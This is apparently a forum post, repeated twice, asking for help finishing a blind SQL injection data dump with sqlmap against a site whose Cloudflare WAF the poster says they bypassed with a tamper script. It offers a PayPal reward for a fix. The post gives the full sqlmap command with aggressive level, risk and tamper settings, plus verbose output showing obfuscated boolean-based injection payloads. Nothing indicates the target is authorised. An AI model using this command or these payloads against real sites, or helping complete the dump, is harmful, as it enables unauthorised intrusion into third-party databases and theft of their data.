I got a Blind SQLi vulnerability, the site's WAF Cloudflare protected but I bypassed with tamper on SQLmap. Got the DB, table and columns name but when I try --dump and --prase-errors I get:
Unable to retrieve the number of column(s)
I ran --is-dba got False. Neither with --no-cast or --hex it doesn't work. Any idea please?
I'll donate by paypal if this gets solved, thanks
Payload:
sqlmap.py -u "www.web.org/vuln=" --technique=B --level=5 --risk=3 --cookie="cookies" --random-agent -D base -T table -C column1,column2 --dump --tamper="nonrecursivereplacement" -v 3 --no-cast
Output:
[19:33:39] [INFO] testing connection to the target URL
[19:33:44] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (CASE) (original value)
Payload: http://ww.xx/yy.php?zz=(CASE WHEN 6311=6311 THEN 2 ELSE NULL END)&aa=bb
Vector: (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
---
[19:33:44] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:33:44] [INFO] testing MySQL
[19:33:44] [DEBUG] resuming configuration option 'string' cc
[19:33:44] [INFO] confirming MySQL
[19:33:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44
back-end DBMS: MySQL >= 5.0.0
[19:33:44] [INFO] fetching entries of column(s) 'column1, column2' for table 'table' in database 'database'
[19:33:44] [INFO] fetching number of column(s) 'column1, column2' entries for table 'table' in database 'database'
[19:33:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:33:44] [WARNING] currently only couple of keywords are being processed ('UNION', 'SELECT', 'INSERT', 'UPDATE', 'FROM', 'WHERE'). You can set it manually according to your needs
[19:33:44] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SESELECTLECT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FROFROMM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/51/!THEN/2/!ELSE//!NULL//!END/)
[19:33:44] [INFO] heuristics detected web page charset 'ascii'
[19:33:44] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SELESELECTCT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FFROMROM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/48/!THEN/2/!ELSE//!NULL//!END/)
[19:33:45] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SELSELECTECT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FROFROMM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/1/!THEN/2/!ELSE//!NULL//!END/)
[19:33:45] [INFO] retrieved:
[19:33:45] [DEBUG] performed 3 queries in 1.06 seconds
[19:33:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:33:45] [WARNING] unable to retrieve the number of column(s) 'column1, column2' entries for table 'table' in database 'database'
I got a Blind SQLi vulnerability, the site's WAF Cloudflare protected but I bypassed with tamper on SQLmap. Got the DB, table and columns name but when I try --dump and --prase-errors I get:
Unable to retrieve the number of column(s)
I ran --is-dba got False. Neither with --no-cast or --hex it doesn't work. Any idea please?
I'll donate by paypal if this gets solved, thanks
Payload:
sqlmap.py -u "www.web.org/vuln=" --technique=B --level=5 --risk=3 --cookie="cookies" --random-agent -D base -T table -C column1,column2 --dump --tamper="nonrecursivereplacement" -v 3 --no-cast
Output:
[19:33:39] [INFO] testing connection to the target URL
[19:33:44] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (CASE) (original value)
Payload: http://ww.xx/yy.php?zz=(CASE WHEN 6311=6311 THEN 2 ELSE NULL END)&aa=bb
Vector: (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
---
[19:33:44] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:33:44] [INFO] testing MySQL
[19:33:44] [DEBUG] resuming configuration option 'string' cc
[19:33:44] [INFO] confirming MySQL
[19:33:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44
back-end DBMS: MySQL >= 5.0.0
[19:33:44] [INFO] fetching entries of column(s) 'column1, column2' for table 'table' in database 'database'
[19:33:44] [INFO] fetching number of column(s) 'column1, column2' entries for table 'table' in database 'database'
[19:33:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:33:44] [WARNING] currently only couple of keywords are being processed ('UNION', 'SELECT', 'INSERT', 'UPDATE', 'FROM', 'WHERE'). You can set it manually according to your needs
[19:33:44] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SESELECTLECT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FROFROMM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/51/!THEN/2/!ELSE//!NULL//!END/)
[19:33:44] [INFO] heuristics detected web page charset 'ascii'
[19:33:44] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SELESELECTCT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FFROMROM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/48/!THEN/2/!ELSE//!NULL//!END/)
[19:33:45] [PAYLOAD] (/!CASE//!WHEN/ORD(MID((/!SELSELECTECT//!IFNULL/(CAST(COUNT()/!AS*//!CHAR/),0x20)/!FROFROMM/database.table),1,1))/!NOT//!BETWEEN/0/!AND/1/!THEN/2/!ELSE//!NULL//!END/)
[19:33:45] [INFO] retrieved:
[19:33:45] [DEBUG] performed 3 queries in 1.06 seconds
[19:33:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:33:45] [WARNING] unable to retrieve the number of column(s) 'column1, column2' entries for table 'table' in database 'database'